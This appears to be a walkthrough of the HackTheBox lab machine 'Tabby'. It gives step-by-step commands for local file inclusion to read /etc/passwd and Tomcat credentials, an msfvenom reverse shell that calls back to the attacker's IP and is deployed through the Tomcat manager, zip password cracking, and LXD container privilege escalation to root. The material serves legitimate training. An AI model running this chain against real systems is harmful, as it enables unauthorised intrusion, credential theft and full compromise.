Tabby is an easy Linux machine from HackTheBox, that is part of the pool of machines that are recommended for preparation for OSCP certification.
Enumeration
Start with nmap scan:
nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 06:30 EDT
Nmap scan report for 10.10.10.194
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploitation of Tomcat
The service that runs on port 80 is vulnerable to LFI, and that’s led to the exposure of the /etc/passwd
view-source:http://10.10.10.194/news.php?file=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
It took a while to find the tomcat-users.xml file, as usually it’s located at usr/share/tomcat9/conf/tomcat-users.xml. In that case, you can find the tomcat-users.xml file at view-source:http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml.
Content of the file:
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
Creating a reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=53 -f war > shell.war
Port number can be any. Here I’m just trying to follow the approach
What if there would be a firewall?and not using something sketchy as port4444
Uploading the reverse shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/shell'
Starting a listener on port 53
nc -nlvp 53
Triggering the shell:
curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/shell/
Upgrading the shell to fully TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
CTRL+Z
stty raw -echo
fg
Privilege escalation with LXC containers
From /etc/passwd file we know that user ash exists in the system. Enumeration PrivEsc ways with linpeas.sh can spot the file 16162020_backup.zip in /var/www/html/files/
Download it to the Kali instance and cracking with fcrackzip:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
Mentioned .zip file contains credentials ash:admin@it.
Switching user with su command.
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
What’s LXD?
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.
Building a custom container:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine
Uploading the new file to the machine and starting exploitation:
lxc image import ./alpine-v3.12-x86_64-20200710_0823.tar.gz --alias exploit
A list of images can be checked with the command:
lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| exploit | 35186ff8d0a4 | no | alpine v3.12 (20200710_08:23) | x86_64 | CONTAINER | 3.05MB | Jul 10, 2020 at 3:28pm (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
The container has been created. Now you can initiate this container as a privileged one and mount a disk as a device:
lxc init exploit honk -c security.privileged=true
lxc config device add honk roguedevice disk source=/ path=/mnt/root recursive=true
lxc start honk
lxc exec honk /bin/sh
As a result, you will spawn a root shell.